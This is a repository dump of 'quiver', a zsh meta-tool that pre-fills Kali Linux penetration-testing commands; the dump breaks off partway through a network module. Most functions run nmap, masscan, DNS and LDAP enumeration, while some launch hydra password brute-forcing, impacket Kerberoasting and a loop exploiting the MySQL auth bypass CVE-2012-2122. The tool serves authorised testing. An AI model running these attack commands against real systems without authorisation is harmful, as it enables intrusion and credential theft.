Repository: stevemcilwain/quiver
Branch: master
Commit: 64cc42a29341
Files: 76
Total size: 179.8 KB
Directory structure:
gitextract_8lk53koa/
├── .gitattributes
├── .gitignore
├── .vscode/
│ └── settings.json
├── LICENSE
├── README.md
├── RELEASES.md
├── VERSION
├── modules/
│ ├── qq-encoding.zsh
│ ├── qq-enum-dhcp.zsh
│ ├── qq-enum-dns.zsh
│ ├── qq-enum-ftp.zsh
│ ├── qq-enum-host.zsh
│ ├── qq-enum-kerb.zsh
│ ├── qq-enum-ldap.zsh
│ ├── qq-enum-mssql.zsh
│ ├── qq-enum-mysql.zsh
│ ├── qq-enum-network.zsh
│ ├── qq-enum-nfs.zsh
│ ├── qq-enum-oracle.zsh
│ ├── qq-enum-pop3.zsh
│ ├── qq-enum-rdp.zsh
│ ├── qq-enum-smb.zsh
│ ├── qq-enum-web-aws.zsh
│ ├── qq-enum-web-dirs.zsh
│ ├── qq-enum-web-eslastic.zsh
│ ├── qq-enum-web-fuzz.zsh
│ ├── qq-enum-web-js.zsh
│ ├── qq-enum-web-php.zsh
│ ├── qq-enum-web-ssl.zsh
│ ├── qq-enum-web-vuln.zsh
│ ├── qq-enum-web.zsh
│ ├── qq-exploit.zsh
│ ├── qq-install.zsh
│ ├── qq-kali.zsh
│ ├── qq-log.zsh
│ ├── qq-notes.zsh
│ ├── qq-pivot.zsh
│ ├── qq-project-custom.zsh
│ ├── qq-project.zsh
│ ├── qq-recon-domains.zsh
│ ├── qq-recon-github.zsh
│ ├── qq-recon-networks.zsh
│ ├── qq-recon-org.zsh
│ ├── qq-recon-subs.zsh
│ ├── qq-scripts.zsh
│ ├── qq-shell-handlers-msf.zsh
│ ├── qq-shell-handlers.zsh
│ ├── qq-shell-tty.zsh
│ ├── qq-srv.zsh
│ ├── qq-vars-global.zsh
│ ├── qq-vars.zsh
│ └── qq.zsh
├── payloads/
│ ├── aka.ms.pem
│ ├── aliases.rc
│ ├── github-dorks-commits.txt
│ ├── msf-windows-payloads.txt
│ ├── recon-dorks-github.txt
│ ├── recon-dorks-google.txt
│ ├── resolvers.txt
│ ├── secrets-content.json
│ ├── secrets-files.json
│ ├── tcp-ports.txt
│ ├── user-agents.txt
│ ├── web-file-upload-bypass-bytes.txt
│ ├── web-file-upload-bypass.txt
│ ├── wordlist-api.txt
│ └── wordlists.txt
├── quiver.code-workspace
├── quiver.plugin.zsh
├── scripts/
│ ├── dns-reverse-brute.zsh
│ ├── image-gen.js
│ ├── recon.zsh
│ ├── webrecon.zsh
│ ├── wildcards.py
│ └── wildcards.sh
└── system/
└── hidpi.sh
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitattributes
================================================
# Auto detect text files and perform LF normalization
* text=auto
================================================
FILE: .gitignore
================================================
# ignore qq-custom.zsh module
modules/qq-custom.zsh
log.txt
remote_checked.txt
remote_ver.txt
================================================
FILE: .vscode/settings.json
================================================
{
"editor.detectIndentation": false
}
================================================
FILE: LICENSE
================================================
MIT License
Copyright (c) 2020 Steve McIlwain
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: README.md
================================================
# Quiver : A Meta-Tool for Kali Linux
Quiver is an organized namespace of shell functions that pre-fill commands in your terminal so that you can ditch your reliance on notes, copying, pasting, editing, copying and pasting again. Quiver helps you remember how to use every tool in your arsenal and doesn't hide them behind scripting that can be cumbersome to maintain or update. Instead you can use Quiver to build a composable, on-the-fly workflow for every situation.
Quiver doesn't cover all tools, it's my own curated collection which I am still adding to and updating. There are so many tools for many different types of engagements and targets, so I jsut try to focus on tools that are maintained and current. Feel free to ask for the inclusion of tools you prefer in the issues list.
# Release 1.0
After months of hard work during lockdown, I am happy to introduce the 1.0 release of Quiver! This version contains many improvements over previous versions such as per-namespace help and installers, auto-fill variables such as RHOST, RPORT, LHOST, LPORT, PROJECT, WORDLIST, URL and global configuration settings for customizing settings like a menu of your favorite wordlists. If you've been using Quiver before now, then many of the changes in 1.0 are breaking changes. Please familiarize yourself with the new commands using `qq-help`. If you previously were storing Quiver values in .zshrc, most of these can now be stored as global vars using `qq-vars-global`.
* [RELEASES.md](RELEASES.md)
# Features
* Prefills the commands within a terminal
* Well-organized commands with tab auto-completion
* Installs as a ZSH / Oh-My-ZSH shell plugin
* Customizable settings, Global variables
* Recon phase commands for OSINT
* Enumeration of common services
* Web enumeration, brute-forcing and hacking
* Exploit compilation helpers
* Reverse shell handlers
* Content serving commands
* Built-in logbook for on-the-fly notes, saving commands
* Render markdown notes to the command line
* Kali Linux system management
* Update notification and install
* Installers for dependencies
# Installation
Quiver requires the following:
* ZSH (apt-get install zsh)
* oh-my-zsh (optional requirement but recommended: https://ohmyz.sh/)
* Kali Linux (https://kali.org)
Clone the repo to your OMZ custom plugins folder.
```bash
git clone https://github.com/stevemcilwain/quiver.git ~/.oh-my-zsh/custom/plugins/quiver
```
Edit ~/.zshrc to load the plugin.
```
plugins=(git quiver)
```
Source .zshrc to load the plugin and you're done. On first load, Quiver will install a few core packages.
```
source ~/.zshrc
```
## Getting Started
Quiver organizes commands into namespaces starting with `qq-`, such as `qq-enum-web` or `qq-recon-domains`.
To see an overview of all namespaces simply use `qq-help`. Each namespace also has it's own help command, such as `qq-enum-web-help` that provides a listing of available commands. All commands support tab completion and search.
## Installing Dependencies
Every namespace was a qq-<namespace>-install command that will install all of the tools relavent to that namespace. You can install just the tools you need, or use `qq-install-all` to run the installers of all namespaces.
## Workflow
Quiver is meant to provide a composable, on-the-fly workflow. It replaces the common painful raw workflow of reading your notes, finding a command, copy, paste, replace the values with target values, copy, paste, run. Some rely heavily on completely automated scripts or frameworks that run all the commands for a workflow and output well-formatted data. While these scripts are great for many use cases, they can often be brittle, hide the underlying tools and techniques and be cumbersom to modify. Instead, Quiver gives you a happy medium, you can run commands quickly and easy with well-organized output, composing your workflow as you go depending on the targets and context.
## Example Workflow
Here is an example workflow for bug bounty hunting:
### Prep
```bash
# if you have markdown notes, configure the path
qq-vars-global-set-notes
# set some session variables for the bounty target
qq-vars-set-project
qq-vars-set-domain
# generate scope files from the bounty url
qq-project-rescope
# save vars for other terminal sessions, qq-vars-load
qq-vars-save
```
### Passive Recon
```bash
# search for target files
qq-recon-org-files
# search downloaded files for urls
qq-recon-org-files-urls
# mine github repos for secrets
qq-recon-github-gitrob
# check dns records
qq-enum-dns-dnsrecon
# look for ASNs and networks
qq-recon-networks-amass-asns
qq-recon-networks-bgpview-ipv4
# get subdomains
qq-recon-subs-subfinder
# resolve and parse subdomains
qq-recon-subs-resolve-massdns
qq-recon-subs-resolve-parse
```
### Active Web Enumeration
```bash
# Download out robots.txt
qq-enum-web-dirs-robots
# ID a WAF if present
qq-enum-web-waf
# Parse SSL certs
qq-enum-web-ssl-certs
# Spider the site
qq-enum-web-gospider
# Brute force URIs
qq-enum-web-dirs-ffuf
# Read your notes
qq-notes
```
================================================
FILE: RELEASES.md
================================================
# Releases
## 1.0 6/4/2020
Complete refactor and reorganization, including:
* Added qq-<namespace>-help commands to all modules
* Added qq-<namespace>-install commands to all modules
* More variables that auto-populate in qq-vars
* Persistent variables in qq-vars-global for customization of settings
* New qq-shell namespaces
* Better organization in qq-recon namespaces
* qq-bounty consolidated into qq-project, custom project commands moved to qq-project-custom
* qq-notes updated with more features
* New qq-kali namespace added with system commands
* qq-install refactored to include custom installers
* New qq-exploit namespace added
* New qq-enum-* namespaces added for more services
## 0.16 3/28/2020
* Fixed qq-bounty.zsh
* Fixed qq-project.zsh: logfile and output settings
* Fixed qq-vars.zsh recursively creating directories in __OUTPUT
## 0.15 3/24/2020
* Added qq-enum-mssql.zsh
* Added qq-enum-mysql.zsh
* Added qq-enum-oracle.zsh
* Added qq-enum-nfs.zsh
* Added qq-enum-pop3.zsh
* qq-srv.zsh: added 3 new listeners for tar, nc>file and b64
## 0.14 3/24/2020
* quiver.plugin.zsh: added zstyle tab autocompletion
** use qq-<tab> to search for commands across any namespace
* qq-install.zsh
** added jsbeautifier
* qq-vars.zsh: set-output will now create the root directory if missing
## 0.12 3/22/2020
* qq-vars.zsh: Added global variables for the most common arguments, load and save
* qq-srv.zsh: added updog
* qq-project.zsh added folder scaffolding for projects / engagements
* qq-log.zsh integration with qq-vars
* Major change to output on all methods, uses $__OUTPUT as the directory from qq-vars.zsh
* Lot of minor changes
## 0.11 - 3/9/2020
* You can now specify a path to your markdown notes by setting $__NOTES
* qq-notes.zsh: notes search and display
* qq-exploit.zsh: compilation helpers
* qq-enum-web-php: php specific enumeration such as lfi, rfi and scans
* minor fixes
## 0.10 - 3/4/2020
* Added module: qq-enum-kerb.zsh for kerboros enumeration functions
* Added module: qq-enum-rdp.zsh for RDP enumeration functions
* Added module: qq-enum-smb.zsh for SMB enumeration functions
* Aded qq-debug to print ~/.quiver/log.txt
* Fixed glow commands to not use pager, leaving the output available in the console window
## 0.9 - 3/4/2020
* Minor fixes and improvements
* Added scripts/recon.zsh
* Added qq-bounty for bug bounty helpers
* Added rescope to install script and qq-bounty
* Added qq-enum-ldap
* Removed noisy banner and log loading to ./quiver/log.txt
* Added qq-enum-ftp-notes-vsftp
* Added qq-custom.zsh module for your custom aliases and functions (ignored)
* Added .gitignore (for qq-custom.zsh)
## 0.8 - 2/25/2020
* qq-pivot: added ssh tunneling commands
* qq-log: added short aliases
* qq-enum-web: moved fuzzing to qq-enum-web-fuzz
* qq-enum-web-fuzz: added/grouped (not dirs) fuzzing commands
* qq-enum-web-xss: added XSS helpers
* qq-enum-web-ssl: added SSL commands and notes
* qq-aliases: better organization, added aliases for custom functions
================================================
FILE: VERSION
================================================
1.0.0
================================================
FILE: modules/qq-encoding.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-encoding
#############################################################
qq-encoding-help() {
cat << "DOC"
qq-encoding
----------
The encoding namespace provides commands for encoding and decoding values.
Commands
--------
qq-encoding-file-to-b64: encodes plain text file to base64, optional $1 as file
qq-encoding-file-from-b64: decodes base64 file to plain text, optional $1 as file
DOC
}
qq-encoding-file-to-b64() {
if [ "$#" -eq "1" ]
then
print -z "cat $1 | base64 > $1.b64"
else
local f && __askpath f FILE $(pwd)
print -z "cat ${f} | base64 > ${f}.b64"
fi
}
qq-encoding-file-from-b64() {
if [ "$#" -eq "1" ]
then
print -z "cat $1 | base64 -d > $1.txt"
else
local f && __askpath f FILE $(pwd)
print -z "cat ${f} | base64 -d > ${f}.txt"
fi
}
================================================
FILE: modules/qq-enum-dhcp.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-dhcp
#############################################################
qq-enum-dhcp-help() {
cat << "DOC"
qq-enum-dhcp
-------------
The qq-enum-dhcp namespace contains commands for scanning and enumerating DHCP servers.
Commands
--------
qq-enum-dhcp-install: installs dependencies
qq-enum-dhcp-nmap-sweep: scan a network for services
qq-enum-dhcp-tcpdump: capture traffic to and from a host
qq-enum-dhcp-discover-nmap: broadcast DHCP discover packets
DOC
}
qq-enum-dhcp-install() {
__info "Running $0..."
__pkgs tcpdump nmap
}
qq-enum-dhcp-sweep-nmap() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sU -p67 ${__NETWORK} -oA $(__netpath)/dhcp-sweep"
}
qq-enum-dhcp-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and udp port 67 and port 68 -w $(__hostpath)/dhcp.pcap"
}
qq-enum-dhcp-discover-nmap() {
print -z "sudo nmap -v --script broadcast-dhcp-discover"
}
================================================
FILE: modules/qq-enum-dns.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-dns
#############################################################
qq-enum-dns-help() {
cat << "DOC"
qq-enum-dns
-------------
The qq-enum-dns namespace contains commands for scanning and enumerating DNS records and servers.
Commands are executed against specific name servers (__RHOST) rather than public resolvers.
Commands
--------
qq-enum-dns-install: installs dependencies
qq-enum-dns-nmap-sweep: scan a network for services
qq-enum-dns-tcpdump: capture traffic to and from a host
qq-enum-dns-host-txfr: attempt a zone transfer
qq-enum-dns-host-all: list all types
qq-enum-dns-host-txt: list txt records
qq-enum-dns-host-mx: list mx records
qq-enum-dns-host-ns: list ns records
qq-enum-dns-host-srv: list srv records
qq-enum-dns-nmap-ad: discover Active Directory related records
qq-enum-dns-dnsrecon: discover dns records, servers and attempt zone txfrs
qq-enum-dns-dnsrecon-reverse: do reverse lookups on an IP network
DOC
}
qq-enum-dns-install() {
__info "Running $0..."
__pkgs tcpdump nmap dnsutils dnsrecon
}
qq-enum-dns-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -sU -p53 ${__NETWORK} -oA $(__netpath)/dns-sweep"
}
qq-enum-dns-tcpdump() {
__check-project
__check-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 53 -w $(__hostpath)/dns.pcap"
}
qq-enum-dns-host-txfr() {
qq-vars-set-rhost
qq-vars-set-domain
print -z "host -l ${__DOMAIN} ${__RHOST}"
}
qq-enum-dns-host-all() {
qq-vars-set-domain
qq-vars-set-rhost
print -z "host -a ${__DOMAIN} ${__RHOST}"
}
qq-enum-dns-host-txt() {
qq-vars-set-domain
qq-vars-set-rhost
print -z "host -t txt ${__DOMAIN} ${__RHOST}"
}
qq-enum-dns-host-mx() {
qq-vars-set-domain
qq-vars-set-rhost
print -z "host -t mx ${__DOMAIN} ${__RHOST}"
}
qq-enum-dns-host-ns() {
qq-vars-set-domain
qq-vars-set-rhost
print -z "host -t ns ${__DOMAIN} ${__RHOST}"
}
qq-enum-dns-host-srv() {
qq-vars-set-domain
qq-vars-set-rhost
print -z "host -t srv ${__DOMAIN} ${__RHOST}"
}
qq-enum-dns-nmap-ad() {
__check-project
qq-vars-set-domain
qq-vars-set-rhost
print -z "nmap --script dns-srv-enum --script-args dns-srv-enum.domain=${__DOMAIN} ${__RHOST} -o $(__dompath)/nmap-AD.txt"
}
qq-enum-dns-dnsrecon() {
__check-project
qq-vars-set-domain
qq-vars-set-rhost
print -z "dnsrecon -d ${__DOMAIN} -n ${__RHOST} -a -s -w -z --threads 10 -c $(__dompath)/dns.csv"
}
qq-enum-dns-dnsrecon-reverse() {
__check-project
qq-vars-set-rhost
mkdir -p ${__PROJECT}/domains
print -z "dnsrecon -r ${__NETWORK} -n ${__RHOST} -c ${__PROJECT}/domains/revdns.csv"
}
================================================
FILE: modules/qq-enum-ftp.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-ftp
#############################################################
qq-enum-ftp-help() {
cat << "DOC"
qq-enum-ftp
-------------
The qq-enum-ftp namespace contains commands for scanning and enumerating FTP servers.
Commands
--------
qq-enum-ftp-install: installs dependencies
qq-enum-ftp-nmap-sweep: scan a network for services
qq-enum-ftp-tcpdump: capture traffic to and from a host
qq-enum-ftp-hydra: brute force passwords for a user account
qq-enum-ftp-lftp-grep: search (grep) the target system
qq-enum-ftp-wget-mirror: mirror the FTP server locally
DOC
}
qq-enum-ftp-install() {
__info "Running $0..."
__pkgs tcpdump nmap hydra ftp lftp wget
}
qq-enum-ftp-sweep-nmap() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -p21 ${__NETWORK} -oA $(__netpath)/ftp-sweep"
}
qq-enum-ftp-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 21 -w $(__hostpath)/ftp.pcap"
}
qq-enum-ftp-hydra() {
__check-project
qq-vars-set-rhost
__check-user
print -z "hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/ftp-hydra-brute.txt ${__RHOST} FTP"
}
qq-enum-ftp-lftp-grep() {
qq-vars-set-rhost
local q && __askvar q QUERY
print -z "lftp ${__RHOST}:/ > find | grep -i \"${QUERY}\" "
}
qq-enum-ftp-wget-mirror() {
__warn "The destination site will be mirrored in the current directory"
qq-vars-set-rhost
local u && __prefill u USER "anonymous"
local p && __prefill p PASSWORD "anonymous@example.com"
print -z "wget --mirror ftp://${u}:${p}@${__RHOST}"
}
================================================
FILE: modules/qq-enum-host.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-host
#############################################################
qq-enum-host-help() {
cat << "DOC"
qq-enum-host
-------------
The qq-enum-host namespace contains commands for scanning and enumerating
an individual host.
Commands
--------
qq-enum-host-install: installs dependencies
qq-enum-host-tcpdump: capture traffic to and from a host
qq-enum-host-nmap-top: syn scan of the top 1000 ports
qq-enum-host-nmap-top-discovery: syn scan of the top 1000 ports with versioning and scripts
qq-enum-host-nmap-all: syn scan all ports
qq-enum-host-nmap-all-discovery: syn scan all ports with versioning and scripts
qq-enum-host-nmap-udp: udp scan top 100 ports
qq-enum-host-masscan-all-tcp: scan all tcp ports
qq-enum-host-masscan-all-udp: scan all udp ports
qq-enum-host-nmap-lse-grep: search nmap lse scripts
DOC
}
qq-enum-host-install() {
__info "Running $0..."
__pkgs tcpdump nmap masscan curl
}
qq-enum-host-tcpdump() {
__check-project
__check-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} -w $(__hostpath)/tcpdump.pcap"
}
qq-enum-host-nmap-top(){
__check-project
qq-vars-set-rhost
print -z "sudo nmap -vvv -Pn -sS --top-ports 1000 --open ${__RHOST} -oA $(__hostpath)/nmap-top"
}
qq-enum-host-nmap-top-discovery(){
__check-project
qq-vars-set-rhost
print -z "sudo nmap -vvv -Pn -sS --top-ports 1000 --open -sC -sV ${__RHOST} -oA $(__hostpath)/nmap-top-discovery"
}
qq-enum-host-nmap-all() {
__check-project
qq-vars-set-rhost
print -z "sudo nmap -vvv -Pn -sS -p- -T4 --open ${__RHOST} -oA $(__hostpath)/nmap-all"
}
qq-enum-host-nmap-all-discovery() {
__check-project
qq-vars-set-rhost
print -z "sudo nmap -vvv -Pn -sS -p- -sC -sV --open ${__RHOST} -oA $(__hostpath)/nmap-all-discovery"
}
qq-enum-host-nmap-udp() {
__check-project
qq-vars-set-rhost
print -z "sudo nmap -v -Pn -sU --top-ports 100 -sV -sC --open ${__RHOST} -oA $(__hostpath)/nmap-udp"
}
qq-enum-host-masscan-all-tcp() {
__check-iface
__check-project
qq-vars-set-rhost
print -z "masscan -p1-65535 --open-only ${__RHOST} --rate=1000 -e ${__IFACE} -oL $(__hostpath)/masscan-all-tcp.txt"
}
qq-enum-host-masscan-all-udp() {
__check-iface
__check-project
qq-vars-set-rhost
print -z "masscan -pU:1-65535 --open-only ${__RHOST} --rate=1000 -e ${__IFACE} -oL $(__hostpath)/masscan-all-udp.txt"
}
qq-enum-host-nmap-lse-grep() {
local q && __askvar q QUERY
print -z "ls /usr/share/nmap/scripts/* | grep -ie \"${q}\" "
}
qq-enum-host-ip() {
__check-project
qq-vars-set-rhost
print -z "curl -s \"https://iplist.cc/api/${__RHOST}\" | tee $(__hostpath/ip.json) "
}
================================================
FILE: modules/qq-enum-kerb.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-kerb
#############################################################
qq-enum-kerb-help() {
cat << "DOC"
qq-enum-kerb
------------
The qq-enum-kerb namespace contains commands for scanning and
enumerating kerberos records and servers.
Commands
--------
qq-enum-kerb-install: installs dependencies
qq-enum-kerb-nmap-sweep: scan a network for services
qq-enum-kerb-tcpdump: capture traffic to and from a host
qq-enum-kerb-users: enumerate domain users
qq-enum-kerb-kerberoast: get SPN for a service account
DOC
}
qq-enum-kerb-install() {
__info "Running $0..."
__pkgs tcpdump nmap impacket-scripts
}
qq-enum-kerb-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -p88 ${__NETWORK} -oA $(__netpath)/kerb-sweep"
}
qq-enum-kerb-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 88 -w $(__hostpath)/kerb.pcap"
}
qq-enum-kerb-users() {
qq-vars-set-rhost
local realm && __askvar realm REALM
print -z "nmap -vvv -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=${realm},userdb=/usr/share/seclists/Usernames/Names/names.txt ${__RHOST}"
}
qq-enum-kerb-kerberoast() {
__ask "Enter target AD domain (must also be set in your hosts file)"
qq-vars-set-domain
__ask "Enter service user account"
__check-user
__ask "Enter the IP address of the target domain controller"
qq-vars-set-rhost
print -z "impacket-GetUserSPNs -request ${__DOMAIN}s/${__USER} -dc-ip ${__RHOST} "
}
================================================
FILE: modules/qq-enum-ldap.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-ldap
#############################################################
qq-enum-ldap-help() {
cat << "DOC"
qq-enum-ldap
------------
The qq-enum-ldap namespace contains commands for scanning and
enumerating Active Directory DC, GC and LDAP servers.
Commands
--------
qq-enum-ldap-install: installs dependencies
qq-enum-ldap-nmap-sweep: scan a network for services
qq-enum-ldap-tcpdump: capture traffic to and from a host
qq-enum-ldap-ctx: query ldap naming contexts
qq-enum-ldap-search-anon: connect with anonymous bind and query ldap
qq-enum-ldap-search-auth: connect with authenticated bind and query ldap
qq-enum-ldap-whoami: send ldap whoami request
qq-enum-ldap-hydra: brute force passwords for a user account
DOC
}
qq-enum-ldap-install() {
__info "Running $0..."
__pkgs tcpdump nmap ldap-utils hydra
}
qq-enum-ldap-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -sU -p389,636,3269 ${__NETWORK} -oA $(__netpath)/ldap-sweep"
}
qq-enum-ldap-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 389 and port 636 and port 3269 -w $(__hostpath)/ldap.pcap"
}
qq-enum-ldap-ctx() {
__ask "Enter the address of the target DC, GC or LDAP server"
qq-vars-set-rhost
print -z "ldapsearch -x -h ${__RHOST} -s base namingcontexts"
}
qq-enum-ldap-search-anon() {
__ask "Enter the address of the target DC, GC or LDAP server"
qq-vars-set-rhost
__ask "Enter a distinguished name (DN), such as: DC=example,DC=com"
local dn && __askvar dn DN
print -z "ldapsearch -x -h ${__RHOST} -s sub -b \"${dn}\" "
}
qq-enum-ldap-search-auth() {
__ask "Enter the address of the target DC, GC or LDAP server"
qq-vars-set-rhost
__ask "Enter a distinguished name (DN), such as: DC=example,DC=com"
local dn && __askvar dn DN
__ask "Enter a user account with bind and read permissions to the directory"
__check-user
print -z "ldapsearch -x -h ${__RHOST} -D '${dn}' \"(objectClass=*)\" -w \"${__USER}\" "
}
qq-enum-ldap-whoami() {
__ask "Enter the address of the target DC, GC or LDAP server"
qq-vars-set-rhost
print -z "ldapwhoami -h ${__RHOST} -w \"non-existing-user\" "
}
qq-enum-ldap-hydra() {
__check-project
qq-vars-set-rhost
__check-user
print -z "hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/ldap-hydra-brute.txt ${__RHOST} LDAP"
}
================================================
FILE: modules/qq-enum-mssql.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-mssql
#############################################################
qq-enum-mssql-help() {
cat << "DOC"
qq-enum-mssql
-------------
The qq-enum-mssql namespace contains commands for scanning and
enumerating MS SQL Server services and databases.
Commands
--------
qq-enum-mssql-install: installs dependencies
qq-enum-mssql-nmap-sweep: scan a network for services
qq-enum-mssql-tcpdump: capture traffic to and from a host
qq-enum-mssql-sqsh: make an interactive database connection
qq-enum-mssql-impacket-client: connect using impacket as a sql client
qq-enum-mssql-hydra: brute force passwords for a user account
DOC
}
qq-enum-mssql-install() {
__info "Running $0..."
__pkgs tcpdump nmap sqsh impacket-scripts hydra
}
qq-enum-mssql-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -sU -p T:1433,U:1434 ${__NETWORK} -oA $(__netpath)/mssql-sweep"
}
qq-enum-mssql-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 1433 -w $(__hostpath)/mssql.pcap"
}
qq-enum-mssql-sqsh() {
__check-project
qq-vars-set-rhost
__check-user
print -z "sqsh -S ${__RHOST} -U ${__USER}"
}
qq-enum-mssql-impacket-client() {
qq-vars-set-rhost
__check-user
local db && __askvar db DATABASE
print -z "python3 ${__IMPACKET}/mssqlclient.py ${__USER}@${__RHOST} -db ${db} -windows-auth "
}
qq-enum-mssql-hydra() {
__check-project
qq-vars-set-rhost
__check-user
print -z "hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/mssql-hydra-brute.txt ${__RHOST} MS-SQL"
}
================================================
FILE: modules/qq-enum-mysql.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-mmysql
#############################################################
qq-enum-mysql-help() {
cat << "DOC"
qq-enum-mysql
-------------
The qq-enum-mysql namespace contains commands for scanning and
enumerating mysql server services and databases.
Commands
--------
qq-enum-mysql-install: installs dependencies
qq-enum-mysql-nmap-sweep: scan a network for services
qq-enum-mysql-tcpdump: capture traffic to and from a host
qq-enum-mysql-client: connect using the mysql client
qq-enum-mysql-auth-bypass: attempt auth bypass
qq-enum-mysql-hydra: brute force passwords for a user account
DOC
}
qq-enum-mysql-install() {
__info "Running $0..."
__pkgs tcpdump nmap mysql
}
qq-enum-mysql-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -p 3306 ${__NETWORK} -oA $(__netpath)/mysql-sweep"
}
qq-enum-mysql-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 3306 -w $(__hostpath)/mysql.pcap"
}
qq-enum-mysql-client(){
qq-vars-set-rhost
__check-user
print -z "mysql -u ${__USER} -p -h ${__RHOST}"
}
qq-enum-mysql-auth-bypass() {
qq-vars-set-rhost
__info "CVE-2012-2122"
print -z "for i in {1..1000}; do mysql -u root --password=bad -h ${__RHOST} 2>/dev/null; done"
}
qq-enum-mysql-hydra() {
__check-project
qq-vars-set-rhost
__check-user
local db && __prefill db DATABASE mysql
print -z "hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/mysql-hydra-brute.txt ${__RHOST} MYSQL ${db}"
}
================================================
FILE: modules/qq-enum-network.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-network
#############################################################
qq-enum-network-help() {
cat << "DOC"
qq-enum-network
-------------
The qq-enum-network namespace contains commands for scanning and enumerating
a network.
Commands
--------
qq-enum-network-install: installs dependencies
qq-enum-network-tcpdump: capture traffic to and from a network
qq-enum-network-tcpdump-bcasts: capture ethernet broadcasts and multi-cast traffic
qq-enum-network-nmap-ping-sweep: sweep a network with ping requests
qq-enum-network-nmap-syn-sweep: sweep a network with TCP syn requests, top 1000 ports
qq-enum-network-nmap-udp-sweep: sweep a network with UDP requests, top 100 ports
qq-enum-network-nmap-all-sweep: sweep a network with TCP syn requests, all ports
qq-enum-network-nmap-discovery: sweep a network with TCP syn requests and scripts, top 100 ports
qq-enum-network-masscan-top: sweep a network with TCP requests, uses $__TCP_PORTS global var
qq-enum-network-masscan-windows: sweep a network for common Windows ports
qq-enum-network-masscan-linux: sweep a network for common Linux ports
qq-enum-network-masscan-web: sweep a network for common web server ports
DOC
}
qq-enum-network-install() {
__info "Running $0..."
__pkgs tcpdump nmap masscan
}
qq-enum-network-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-network
print -z "sudo tcpdump -i ${__IFACE} net ${__NETWORK} -w $(__netpath)/network.pcap"
}
qq-enum-network-tcpdump-bcasts() {
__check-project
qq-vars-set-iface
print -z "sudo tcpdump -i ${__IFACE} ether broadcast and ether multicast -w $__PROJECT/networks/bcasts.pcap"
}
qq-enum-network-nmap-ping-sweep() {
__check-project
qq-vars-set-network
print -z "nmap -vvv -sn --open ${__NETWORK} -oA $(__netpath)/nmap-ping-sweep"
}
qq-enum-network-nmap-syn-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -vvv -n -Pn -sS --open --top-ports 100 ${__NETWORK} -oA $(__netpath)/nmap-syn-sweep"
}
qq-enum-network-nmap-udp-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -vvv -n -Pn -sU --open --top-ports 100 ${__NETWORK} -oA $(__netpath)/nmap-udp-sweep"
}
qq-enum-network-nmap-all-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -vvv -n -Pn -T4 --open -sS -p- ${__NETWORK} -oA $(__netpath)/nmap-all-sweep"
}
qq-enum-network-nmap-discovery() {
__check-project
qq-vars-set-network
print -z "nmap -vvv -n -Pn -sV -sC --top-ports 100 ${__NETWORK} -oA $(__netpath)/nmap-discovery"
}
qq-enum-network-masscan-top() {
__check-project
qq-vars-set-network
